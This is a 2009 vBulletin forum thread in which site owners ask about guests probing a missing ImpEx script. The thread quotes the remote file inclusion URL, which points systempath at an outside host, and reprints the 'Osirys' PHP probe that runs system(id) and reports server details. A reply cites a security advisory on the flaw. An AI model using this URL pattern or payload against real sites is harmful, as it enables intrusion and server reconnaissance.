Announcement

Collapse
No announcement yet.

Potential hack??

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Potential hack??

    We have multiple guest trying to access a page that our "whosonline"
    states is unknown.

    It appears to be some sort of php redirect or info gathering.

    This is the link that it shows they are trying to access yet that
    folder does not exist on our server but- when clicked, it goes to what
    appears to be one of our pages..very odd. We locked the board. Can
    this do us harm?

    Link:
    http://www.barrelracingbuzz.com/thebuzz/index.php/impex/ImpExData.php?systempath=http://www.scv.co.kr/zboard/info.txt
    ???

    What's weird is that the abovelink looks almost like my board..but doesn't. Some of the links are incorrect in the nav bar. It is really weird. It has my header and graphics..but the navigation is different? WTF??

    Help! Thanks in advance!!

    Attached Files
    Last edited by Sheridan; Sun 4 Jan '09, 5:16pm.

  • #2
    Guest Unknown Location
    /thebuzz/index.php/impex/ImpExData.php?systempath=http:/www.scv.co.kr/zboard/info.txt
    host-198.247.172.4.gsinetblock.net

    Comment


    • #3
      I have the same thing on my forum. I was just going to ask the same question.

      Attached Files

      Comment


      • #4
        Has anyone figured out what this is about???? I have the samething happening at my forum. But my version is 3.7

        Gemma

        Comment


        • #5
          I am seriously freaked out? How can I have an UNKNOWN LOCATION on the board?? I don't have a folder on my server for any of this..

          Are they re directing my site? It's like they are scanning my site page by page.. But I don't have a Impex page..

          I locked my board for awhile... But unlocked and they are back... from Colorado, Korea, and Masschusetts ..

          I just set my forum where unregistered guests canot view the forum. It seems to have locked them out so far. But this is bad for business...

          Help!!
          Last edited by Sheridan; Sun 4 Jan '09, 5:57pm.

          Comment


          • #6
            I have kept my 3.7 board shut down for now until someone responds with an answer.

            Comment


            • #7
              You don't have impex installed, do you?
              It looks like they are just fishing.

              I see people looking for files all the time in my error log.
              ...steven
              www.318ti.org (vB3.8) | www.nccbmwcca.org (vB4.2)
              bmwcca.org/forum | m135i.net
              "I tried to clean this up but this thread is beyond redemption." - Steve Machol

              Comment


              • #8
                this is really weird, my board had the exact same thing and i had like 7 "guests" having the same thing on the online page, i hopped on here to make a thread but i found this one. what exactly is this? oh yea, the unknown location is the exact same address as the picture first attached.

                Comment


                • #9
                  I started banning the ip addresses that are at the unknown locations.

                  Comment


                  • #10
                    I don't have a folder on my server that says Impex... so I must not have it loaded..

                    I'm running 3.7.0

                    You are going to run out of banning room...lol..

                    Go diable guests from viewing the forum..

                    Comment


                    • #11
                      Originally posted by Sheridan View Post
                      I don't have a folder on my server that says Impex... so I must not have it loaded..
                      Then I would not worry about it.

                      I'm running 3.7.0
                      I would upgrade to 3.7.4p1 regardless.

                      You are going to run out of banning room...lol..

                      Go diable guests from viewing the forum..
                      I don't think disabling guests won't do anything.

                      Personally, I would not be concerned.
                      ...steven
                      www.318ti.org (vB3.8) | www.nccbmwcca.org (vB4.2)
                      bmwcca.org/forum | m135i.net
                      "I tried to clean this up but this thread is beyond redemption." - Steve Machol

                      Comment


                      • #12
                        I went to http://www.scv.co.kr/zboard/info.txt which is part of the unknown path. This is what it says. Does any of this make any sense to you?

                        <?phpfunction ConvertBytes($number) {$len = strlen($number);if($len < 4) {return sprintf("%d b", $number); }if($len >= 4 && $len <=6) {return sprintf("%0.2f Kb", $number/1024); }if($len >= 7 && $len <=9) {return sprintf("%0.2f Mb", $number/1024/1024); }return sprintf("%0.2f Gb", $number/1024/1024/1024); } echo "Osirys<br>";$un = @php_uname();$id1 = system(id);$pwd1 = @getcwd();$free1= diskfreespace($pwd1);$free = ConvertBytes(diskfreespace($pwd1));if (!$free) {$free = 0;}$all1= disk_total_space($pwd1);$all = ConvertBytes(disk_total_space($pwd1));if (!$all) {$all = 0;}$used = ConvertBytes($all1-$free1);$os = @PHP_OS;echo "0sirys was here and also is a ****ing gay..<br>";echo "uname -a: $un<br>";echo "os: $os<br>";echo "id: $id1<br>";echo "free: $free<br>";echo "used: $used<br>";echo "total: $all<br>";exit;

                        Comment


                        • #13
                          doesn't make sense to me..that's why I made this post..

                          but if you click on the link in your "whosonline" page that they are trying to access...your site will come up but it is not totally functional and it will have that odd address on the end of it.. It looks like the beginning of a re direct...

                          And after I diabled guests...I have a stop sign next to the guests and the page they are trying to view.. So did I lock em out or not??

                          I swear? Are there not any Vbulletin folks out on a Sunday night?

                          Comment


                          • #14
                            http://xforce.iss.net/xforce/xfdb/25391

                            Reported: Mar 23, 2006
                            vBulletin ImpEx module ImpExData.php file include

                            impex-impexdata-file-include (25391) Medium Risk Description:
                            ImpEx could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the ImpExData.php script using the 'systempath' variable to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.
                            Platforms Affected:
                            • Jelsoft Enterprises, ImpEx 1.74 and prior
                            • Jelsoft Enterprises, vBulletin 3.5.0 or later

                            Remedy:
                            Upgrade to the latest version of vBulletin (1.75 or later), available from the vBulletin Web site. See References.
                            Edit: You don't have ImpEx installed, so there is no danger.
                            ...steven
                            www.318ti.org (vB3.8) | www.nccbmwcca.org (vB4.2)
                            bmwcca.org/forum | m135i.net
                            "I tried to clean this up but this thread is beyond redemption." - Steve Machol

                            Comment


                            • #15
                              Thank you...

                              I have 3.7.0.. so am I screwed?

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X